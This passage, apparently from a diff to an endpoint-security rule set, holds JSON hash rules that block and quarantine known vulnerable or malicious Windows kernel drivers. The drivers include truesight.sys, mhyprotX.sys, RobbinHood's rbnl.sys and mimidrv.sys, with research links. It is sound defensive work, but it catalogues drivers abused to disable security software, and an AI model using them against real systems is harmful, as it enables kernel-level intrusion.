"013d03802f367cd8c8d45590bb27d01672d91808b157611f687ac603be778dcc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e5f6ef4-aded-5b93-9f80-00f6384bc5e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827035Z", + "creation_date": 
"2026-03-23T11:45:30.827037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827042Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d31de75c30d650de31bfeb5748f7981960672aa2fc26c8b49ff02c75d1446cc2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e628a5e-5f60-5e77-b938-14bceb58853c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977469Z", + "creation_date": "2026-03-23T11:45:29.977471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e72d7e2-b53d-59b2-b3f0-fe421468eb51", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621829Z", + "creation_date": "2026-03-23T11:45:29.621831Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621836Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "739c11fdb8673ab5b78f1a874daf5ba3faddb7910a6d4e0cc49abd8b8537333f", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e7abd0d-7e89-52a7-9e12-99a66349cb11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617833Z", + "creation_date": "2026-03-23T11:45:29.617835Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617840Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e7d5263-a185-5503-8be8-ff7bdf445e25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481922Z", + "creation_date": "2026-03-23T11:45:31.481926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b707f011d2e9a0d68513e7190ee788114fae3abacaf81ffbd6c187a71ab8d100", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e80d689-e7f2-56ae-8e0c-0543046db358", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500283Z", + "creation_date": "2026-03-23T11:45:31.500286Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d86fead83d85832f0fa80d7b5c752dd3742b2ac3573cbaf89d3e2f2e58fdbe3e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4e844007-3826-5800-9e31-3e204762f4de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609576Z", + "creation_date": "2026-03-23T11:45:29.609577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8", + "comment": "RobbinHood ransomware malicious driver (aka rbnl.sys) [https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ea2d991-9422-57c8-9d34-fe22c8ce425f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830089Z", + "creation_date": "2026-03-23T11:45:31.830091Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e824ccb01e6df3cee8077e15440de5b00fe40ffea71b6ead64cef1512d3a08a6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ea40022-e9c4-58ba-948e-f98c8bd6db23", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828419Z", + "creation_date": "2026-03-23T11:45:30.828421Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828426Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4144020a979834bc64cb19a0e82daa99462ccb3629b7a6f7cc9cd2beaf5909eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4eaa679c-df42-5f20-af10-74d8b9824439", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480488Z", + "creation_date": "2026-03-23T11:45:30.480490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5d8a10b966e30ee6a696ecc6809936411be7ff672593998693c6b1a58baf0e42", + "comment": "Vulnerable Kernel Driver (aka 
GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4eae0368-de5d-5c3c-91ab-7593b964862b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973415Z", + "creation_date": "2026-03-23T11:45:29.973417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973423Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c731c0ea7f28671ab7787800db69739ea5cd6be16ea21045b4580cf95cbf73b", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4eb460e8-ecfb-59cb-89e0-eb144d1327dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612001Z", + 
"creation_date": "2026-03-23T11:45:29.612003Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612008Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24e70c87d58fa5771f02b9ddf0d8870cba6b26e35c6455a2c77f482e2080d3e9", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4eba68d7-ecce-58d5-bddf-d0358daea3e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820643Z", + "creation_date": "2026-03-23T11:45:31.820646Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820655Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cf8b71409b1a00d032d9a62a90f50e3bc5e5b0d0963357d2cb20d48eb0cc32a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ec44353-da03-55d2-8a5a-2061e4a3a66d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619439Z", + "creation_date": "2026-03-23T11:45:29.619441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619446Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8944a3f50f38d92d17b8cfe2e08201a79ea30f38812d18f28036e59789d3f58c", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ec5c141-60d5-5a40-af5d-ba2cc6b3cb61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827344Z", + "creation_date": "2026-03-23T11:45:30.827346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827352Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4e83f7397ed109520ed7651f57202cd7158317829a7b5ffb381e8caed4e42f4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ed39125-ebe7-521f-9b53-879c593e1400", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976029Z", + "creation_date": "2026-03-23T11:45:29.976031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62bd7f8922d8b4ee00d1aea58a885a2c10cbe4c4e51f567b033454aacf7c6b99", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ee58a94-1985-5751-81f2-acc544f27857", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807678Z", + "creation_date": "2026-03-23T11:45:31.807680Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9e0c3b29e8e0118622b3f5fcdd104190329e2635660d8ff5870263ddf5d18d4f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4ef02bdf-82fa-521a-a0e1-436b4c0e8617", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145430Z", + "creation_date": "2026-03-23T11:45:31.145432Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145437Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "39858843fe5f4c5b8969c6efc6817ba4e975be34cb8cab113456656e9b75f4d5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4efb9e1b-db17-589d-a053-97d5eee4920d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466214Z", + "creation_date": "2026-03-23T11:45:30.466217Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28f5aa194a384680a08c0467e94a8fc40f8b0f3f2ac5deb42e0f51a80d27b553", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4effe5cc-109f-5e72-89e7-29ed3d359cf4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982467Z", + "creation_date": "2026-03-23T11:45:29.982469Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2e17e6e222316a4c70dc931d5c550466eb5d3e325794731002792e5587dc29d", + "comment": "Vulnerable Kernel Driver (aka Lurker.sys) [https://www.loldrivers.io/drivers/3fb743b8-d3ed-4873-9c95-e212720dde21/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f0383de-b72b-50e7-b0a2-224d9fa9a78e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823790Z", + "creation_date": "2026-03-23T11:45:30.823792Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823798Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2b3fb7a9a431d45d9225424448aed87b71f5dc7cf8a2c1591a77c86971becda", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f0c1cfd-8272-5153-9d6d-279f364bbf6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824321Z", + "creation_date": "2026-03-23T11:45:31.824325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c596759c37c74fa2c6f423c86e3fbc7e69aa6d0ebf6f26b2ccd1c774cafbc06", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f1f256c-5765-5b52-b87f-9846fbfa3cd2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829167Z", + "creation_date": 
"2026-03-23T11:45:30.829169Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54905e43b198a32610a2b935f3dba88d81b41ebcc8e06f4639b92dfbdd0404bc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4f21976a-c425-531c-b322-010b83072fed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479565Z", + "creation_date": "2026-03-23T11:45:30.479567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479573Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5a7bde3c194e84070ff15718e58b6d9a79d5b11fb4f5754ecbae9f6fee1ca40f", + "comment": "Malicious Kernel Driver (aka e939448b28a4edc81f1f974cebf6e7d2.sys) [https://www.loldrivers.io/drivers/4f2edf45-b135-404f-bedc-9583f0bae574/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
